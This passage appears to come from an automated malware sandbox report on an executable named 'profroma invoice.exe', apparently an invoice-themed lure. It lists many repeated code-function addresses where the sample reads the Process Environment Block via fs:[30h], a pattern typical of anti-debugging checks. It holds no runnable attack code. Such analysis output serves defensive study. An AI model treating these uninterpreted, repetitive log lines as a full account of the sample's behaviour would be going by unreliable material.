                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017C2000 mov eax, dword ptr fs:[00000030h]4_2_017C2000
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017C2000 mov eax, dword ptr fs:[00000030h]4_2_017C2000
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017C2000 mov eax, dword ptr fs:[00000030h]4_2_017C2000
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017C2000 mov eax, dword ptr fs:[00000030h]4_2_017C2000
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017C2000 mov eax, dword ptr fs:[00000030h]4_2_017C2000
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017C2000 mov eax, dword ptr fs:[00000030h]4_2_017C2000
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017C2000 mov eax, dword ptr fs:[00000030h]4_2_017C2000
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017C2000 mov eax, dword ptr fs:[00000030h]4_2_017C2000
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0171C0F0 mov eax, dword ptr fs:[00000030h]4_2_0171C0F0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017620F0 mov ecx, dword ptr fs:[00000030h]4_2_017620F0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0171A0E3 mov ecx, dword ptr fs:[00000030h]4_2_0171A0E3
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017A60E0 mov eax, dword ptr fs:[00000030h]4_2_017A60E0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017280E9 mov eax, dword ptr fs:[00000030h]4_2_017280E9
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017A20DE mov eax, dword ptr fs:[00000030h]4_2_017A20DE
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017E60B8 mov eax, dword ptr fs:[00000030h]4_2_017E60B8
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017E60B8 mov ecx, dword ptr fs:[00000030h]4_2_017E60B8
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017180A0 mov eax, dword ptr fs:[00000030h]4_2_017180A0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017B80A8 mov eax, dword ptr fs:[00000030h]4_2_017B80A8
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0172208A mov eax, dword ptr fs:[00000030h]4_2_0172208A
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017C437C mov eax, dword ptr fs:[00000030h]4_2_017C437C
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017A035C mov eax, dword ptr fs:[00000030h]4_2_017A035C
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017A035C mov eax, dword ptr fs:[00000030h]4_2_017A035C
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017A035C mov eax, dword ptr fs:[00000030h]4_2_017A035C
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017A035C mov ecx, dword ptr fs:[00000030h]4_2_017A035C
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017A035C mov eax, dword ptr fs:[00000030h]4_2_017A035C
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017A035C mov eax, dword ptr fs:[00000030h]4_2_017A035C
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017EA352 mov eax, dword ptr fs:[00000030h]4_2_017EA352
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017C8350 mov ecx, dword ptr fs:[00000030h]4_2_017C8350
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017F634F mov eax, dword ptr fs:[00000030h]4_2_017F634F
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017A2349 mov eax, dword ptr fs:[00000030h]4_2_017A2349
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017A2349 mov eax, dword ptr fs:[00000030h]4_2_017A2349
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017A2349 mov eax, dword ptr fs:[00000030h]4_2_017A2349
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017A2349 mov eax, dword ptr fs:[00000030h]4_2_017A2349
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017A2349 mov eax, dword ptr fs:[00000030h]4_2_017A2349
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017A2349 mov eax, dword ptr fs:[00000030h]4_2_017A2349
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017A2349 mov eax, dword ptr fs:[00000030h]4_2_017A2349
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017A2349 mov eax, dword ptr fs:[00000030h]4_2_017A2349
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017A2349 mov eax, dword ptr fs:[00000030h]4_2_017A2349
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017A2349 mov eax, dword ptr fs:[00000030h]4_2_017A2349
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017A2349 mov eax, dword ptr fs:[00000030h]4_2_017A2349
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017A2349 mov eax, dword ptr fs:[00000030h]4_2_017A2349
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017A2349 mov eax, dword ptr fs:[00000030h]4_2_017A2349
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017A2349 mov eax, dword ptr fs:[00000030h]4_2_017A2349
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017A2349 mov eax, dword ptr fs:[00000030h]4_2_017A2349
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017F8324 mov eax, dword ptr fs:[00000030h]4_2_017F8324
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017F8324 mov ecx, dword ptr fs:[00000030h]4_2_017F8324
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017F8324 mov eax, dword ptr fs:[00000030h]4_2_017F8324
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017F8324 mov eax, dword ptr fs:[00000030h]4_2_017F8324
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0171C310 mov ecx, dword ptr fs:[00000030h]4_2_0171C310
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01740310 mov ecx, dword ptr fs:[00000030h]4_2_01740310
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0175A30B mov eax, dword ptr fs:[00000030h]4_2_0175A30B
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0175A30B mov eax, dword ptr fs:[00000030h]4_2_0175A30B
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0175A30B mov eax, dword ptr fs:[00000030h]4_2_0175A30B
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0173E3F0 mov eax, dword ptr fs:[00000030h]4_2_0173E3F0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0173E3F0 mov eax, dword ptr fs:[00000030h]4_2_0173E3F0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0173E3F0 mov eax, dword ptr fs:[00000030h]4_2_0173E3F0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017563FF mov eax, dword ptr fs:[00000030h]4_2_017563FF
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017303E9 mov eax, dword ptr fs:[00000030h]4_2_017303E9
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017303E9 mov eax, dword ptr fs:[00000030h]4_2_017303E9
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017303E9 mov eax, dword ptr fs:[00000030h]4_2_017303E9
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017303E9 mov eax, dword ptr fs:[00000030h]4_2_017303E9
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017303E9 mov eax, dword ptr fs:[00000030h]4_2_017303E9
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017303E9 mov eax, dword ptr fs:[00000030h]4_2_017303E9
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017303E9 mov eax, dword ptr fs:[00000030h]4_2_017303E9
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017303E9 mov eax, dword ptr fs:[00000030h]4_2_017303E9
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017CE3DB mov eax, dword ptr fs:[00000030h]4_2_017CE3DB
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017CE3DB mov eax, dword ptr fs:[00000030h]4_2_017CE3DB
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017CE3DB mov ecx, dword ptr fs:[00000030h]4_2_017CE3DB
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017CE3DB mov eax, dword ptr fs:[00000030h]4_2_017CE3DB
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017C43D4 mov eax, dword ptr fs:[00000030h]4_2_017C43D4
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017C43D4 mov eax, dword ptr fs:[00000030h]4_2_017C43D4
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017DC3CD mov eax, dword ptr fs:[00000030h]4_2_017DC3CD
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0172A3C0 mov eax, dword ptr fs:[00000030h]4_2_0172A3C0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0172A3C0 mov eax, dword ptr fs:[00000030h]4_2_0172A3C0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0172A3C0 mov eax, dword ptr fs:[00000030h]4_2_0172A3C0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0172A3C0 mov eax, dword ptr fs:[00000030h]4_2_0172A3C0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0172A3C0 mov eax, dword ptr fs:[00000030h]4_2_0172A3C0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0172A3C0 mov eax, dword ptr fs:[00000030h]4_2_0172A3C0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017283C0 mov eax, dword ptr fs:[00000030h]4_2_017283C0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017283C0 mov eax, dword ptr fs:[00000030h]4_2_017283C0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017283C0 mov eax, dword ptr fs:[00000030h]4_2_017283C0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017283C0 mov eax, dword ptr fs:[00000030h]4_2_017283C0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017A63C0 mov eax, dword ptr fs:[00000030h]4_2_017A63C0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01718397 mov eax, dword ptr fs:[00000030h]4_2_01718397
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01718397 mov eax, dword ptr fs:[00000030h]4_2_01718397
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01718397 mov eax, dword ptr fs:[00000030h]4_2_01718397
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0171E388 mov eax, dword ptr fs:[00000030h]4_2_0171E388
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0171E388 mov eax, dword ptr fs:[00000030h]4_2_0171E388
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0171E388 mov eax, dword ptr fs:[00000030h]4_2_0171E388
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0174438F mov eax, dword ptr fs:[00000030h]4_2_0174438F
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0174438F mov eax, dword ptr fs:[00000030h]4_2_0174438F
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017D0274 mov eax, dword ptr fs:[00000030h]4_2_017D0274
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017D0274 mov eax, dword ptr fs:[00000030h]4_2_017D0274
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017D0274 mov eax, dword ptr fs:[00000030h]4_2_017D0274
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017D0274 mov eax, dword ptr fs:[00000030h]4_2_017D0274
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017D0274 mov eax, dword ptr fs:[00000030h]4_2_017D0274
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017D0274 mov eax, dword ptr fs:[00000030h]4_2_017D0274
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017D0274 mov eax, dword ptr fs:[00000030h]4_2_017D0274
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017D0274 mov eax, dword ptr fs:[00000030h]4_2_017D0274
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017D0274 mov eax, dword ptr fs:[00000030h]4_2_017D0274
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017D0274 mov eax, dword ptr fs:[00000030h]4_2_017D0274
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017D0274 mov eax, dword ptr fs:[00000030h]4_2_017D0274
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017D0274 mov eax, dword ptr fs:[00000030h]4_2_017D0274
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01724260 mov eax, dword ptr fs:[00000030h]4_2_01724260
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01724260 mov eax, dword ptr fs:[00000030h]4_2_01724260
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01724260 mov eax, dword ptr fs:[00000030h]4_2_01724260
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0171826B mov eax, dword ptr fs:[00000030h]4_2_0171826B
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0171A250 mov eax, dword ptr fs:[00000030h]4_2_0171A250
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017F625D mov eax, dword ptr fs:[00000030h]4_2_017F625D
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01726259 mov eax, dword ptr fs:[00000030h]4_2_01726259
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017DA250 mov eax, dword ptr fs:[00000030h]4_2_017DA250
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017DA250 mov eax, dword ptr fs:[00000030h]4_2_017DA250
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017A8243 mov eax, dword ptr fs:[00000030h]4_2_017A8243
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017A8243 mov ecx, dword ptr fs:[00000030h]4_2_017A8243
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0171823B mov eax, dword ptr fs:[00000030h]4_2_0171823B
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017302E1 mov eax, dword ptr fs:[00000030h]4_2_017302E1
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017302E1 mov eax, dword ptr fs:[00000030h]4_2_017302E1
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017302E1 mov eax, dword ptr fs:[00000030h]4_2_017302E1
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017F62D6 mov eax, dword ptr fs:[00000030h]4_2_017F62D6
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0172A2C3 mov eax, dword ptr fs:[00000030h]4_2_0172A2C3
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0172A2C3 mov eax, dword ptr fs:[00000030h]4_2_0172A2C3
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0172A2C3 mov eax, dword ptr fs:[00000030h]4_2_0172A2C3
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0172A2C3 mov eax, dword ptr fs:[00000030h]4_2_0172A2C3
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0172A2C3 mov eax, dword ptr fs:[00000030h]4_2_0172A2C3
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017302A0 mov eax, dword ptr fs:[00000030h]4_2_017302A0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017302A0 mov eax, dword ptr fs:[00000030h]4_2_017302A0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017B62A0 mov eax, dword ptr fs:[00000030h]4_2_017B62A0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017B62A0 mov ecx, dword ptr fs:[00000030h]4_2_017B62A0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017B62A0 mov eax, dword ptr fs:[00000030h]4_2_017B62A0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017B62A0 mov eax, dword ptr fs:[00000030h]4_2_017B62A0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017B62A0 mov eax, dword ptr fs:[00000030h]4_2_017B62A0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017B62A0 mov eax, dword ptr fs:[00000030h]4_2_017B62A0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0175E284 mov eax, dword ptr fs:[00000030h]4_2_0175E284
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0175E284 mov eax, dword ptr fs:[00000030h]4_2_0175E284
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017A0283 mov eax, dword ptr fs:[00000030h]4_2_017A0283
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017A0283 mov eax, dword ptr fs:[00000030h]4_2_017A0283
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017A0283 mov eax, dword ptr fs:[00000030h]4_2_017A0283
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0175656A mov eax, dword ptr fs:[00000030h]4_2_0175656A
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0175656A mov eax, dword ptr fs:[00000030h]4_2_0175656A
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0175656A mov eax, dword ptr fs:[00000030h]4_2_0175656A
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01728550 mov eax, dword ptr fs:[00000030h]4_2_01728550
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01728550 mov eax, dword ptr fs:[00000030h]4_2_01728550
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01730535 mov eax, dword ptr fs:[00000030h]4_2_01730535
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01730535 mov eax, dword ptr fs:[00000030h]4_2_01730535
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01730535 mov eax, dword ptr fs:[00000030h]4_2_01730535
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01730535 mov eax, dword ptr fs:[00000030h]4_2_01730535
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01730535 mov eax, dword ptr fs:[00000030h]4_2_01730535
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01730535 mov eax, dword ptr fs:[00000030h]4_2_01730535
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0174E53E mov eax, dword ptr fs:[00000030h]4_2_0174E53E
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0174E53E mov eax, dword ptr fs:[00000030h]4_2_0174E53E
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0174E53E mov eax, dword ptr fs:[00000030h]4_2_0174E53E
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0174E53E mov eax, dword ptr fs:[00000030h]4_2_0174E53E
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0174E53E mov eax, dword ptr fs:[00000030h]4_2_0174E53E
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017B6500 mov eax, dword ptr fs:[00000030h]4_2_017B6500
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017F4500 mov eax, dword ptr fs:[00000030h]4_2_017F4500
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017F4500 mov eax, dword ptr fs:[00000030h]4_2_017F4500
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017F4500 mov eax, dword ptr fs:[00000030h]4_2_017F4500
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017F4500 mov eax, dword ptr fs:[00000030h]4_2_017F4500
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017F4500 mov eax, dword ptr fs:[00000030h]4_2_017F4500
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017F4500 mov eax, dword ptr fs:[00000030h]4_2_017F4500
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017F4500 mov eax, dword ptr fs:[00000030h]4_2_017F4500
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017225E0 mov eax, dword ptr fs:[00000030h]4_2_017225E0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0174E5E7 mov eax, dword ptr fs:[00000030h]4_2_0174E5E7
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0174E5E7 mov eax, dword ptr fs:[00000030h]4_2_0174E5E7
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0174E5E7 mov eax, dword ptr fs:[00000030h]4_2_0174E5E7
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0174E5E7 mov eax, dword ptr fs:[00000030h]4_2_0174E5E7
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0174E5E7 mov eax, dword ptr fs:[00000030h]4_2_0174E5E7
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0174E5E7 mov eax, dword ptr fs:[00000030h]4_2_0174E5E7
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0174E5E7 mov eax, dword ptr fs:[00000030h]4_2_0174E5E7
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0174E5E7 mov eax, dword ptr fs:[00000030h]4_2_0174E5E7
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0175C5ED mov eax, dword ptr fs:[00000030h]4_2_0175C5ED
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0175C5ED mov eax, dword ptr fs:[00000030h]4_2_0175C5ED
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017265D0 mov eax, dword ptr fs:[00000030h]4_2_017265D0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0175A5D0 mov eax, dword ptr fs:[00000030h]4_2_0175A5D0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0175A5D0 mov eax, dword ptr fs:[00000030h]4_2_0175A5D0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0175E5CF mov eax, dword ptr fs:[00000030h]4_2_0175E5CF
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0175E5CF mov eax, dword ptr fs:[00000030h]4_2_0175E5CF
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017445B1 mov eax, dword ptr fs:[00000030h]4_2_017445B1
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017445B1 mov eax, dword ptr fs:[00000030h]4_2_017445B1
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017A05A7 mov eax, dword ptr fs:[00000030h]4_2_017A05A7
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017A05A7 mov eax, dword ptr fs:[00000030h]4_2_017A05A7
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017A05A7 mov eax, dword ptr fs:[00000030h]4_2_017A05A7
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0175E59C mov eax, dword ptr fs:[00000030h]4_2_0175E59C
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01722582 mov eax, dword ptr fs:[00000030h]4_2_01722582
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01722582 mov ecx, dword ptr fs:[00000030h]4_2_01722582
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01754588 mov eax, dword ptr fs:[00000030h]4_2_01754588
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0174A470 mov eax, dword ptr fs:[00000030h]4_2_0174A470
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0174A470 mov eax, dword ptr fs:[00000030h]4_2_0174A470
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0174A470 mov eax, dword ptr fs:[00000030h]4_2_0174A470
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017AC460 mov ecx, dword ptr fs:[00000030h]4_2_017AC460
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017DA456 mov eax, dword ptr fs:[00000030h]4_2_017DA456
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0171645D mov eax, dword ptr fs:[00000030h]4_2_0171645D
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0174245A mov eax, dword ptr fs:[00000030h]4_2_0174245A
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0175E443 mov eax, dword ptr fs:[00000030h]4_2_0175E443
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0175E443 mov eax, dword ptr fs:[00000030h]4_2_0175E443
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0175E443 mov eax, dword ptr fs:[00000030h]4_2_0175E443
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0175E443 mov eax, dword ptr fs:[00000030h]4_2_0175E443
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0175E443 mov eax, dword ptr fs:[00000030h]4_2_0175E443
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0175E443 mov eax, dword ptr fs:[00000030h]4_2_0175E443
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0175E443 mov eax, dword ptr fs:[00000030h]4_2_0175E443
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0175E443 mov eax, dword ptr fs:[00000030h]4_2_0175E443
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0175A430 mov eax, dword ptr fs:[00000030h]4_2_0175A430
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0171E420 mov eax, dword ptr fs:[00000030h]4_2_0171E420
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0171E420 mov eax, dword ptr fs:[00000030h]4_2_0171E420
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0171E420 mov eax, dword ptr fs:[00000030h]4_2_0171E420
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0171C427 mov eax, dword ptr fs:[00000030h]4_2_0171C427
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017A6420 mov eax, dword ptr fs:[00000030h]4_2_017A6420
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017A6420 mov eax, dword ptr fs:[00000030h]4_2_017A6420
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017A6420 mov eax, dword ptr fs:[00000030h]4_2_017A6420
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017A6420 mov eax, dword ptr fs:[00000030h]4_2_017A6420
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017A6420 mov eax, dword ptr fs:[00000030h]4_2_017A6420
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017A6420 mov eax, dword ptr fs:[00000030h]4_2_017A6420
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017A6420 mov eax, dword ptr fs:[00000030h]4_2_017A6420
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01758402 mov eax, dword ptr fs:[00000030h]4_2_01758402
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01758402 mov eax, dword ptr fs:[00000030h]4_2_01758402
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01758402 mov eax, dword ptr fs:[00000030h]4_2_01758402
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017204E5 mov ecx, dword ptr fs:[00000030h]4_2_017204E5
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017544B0 mov ecx, dword ptr fs:[00000030h]4_2_017544B0
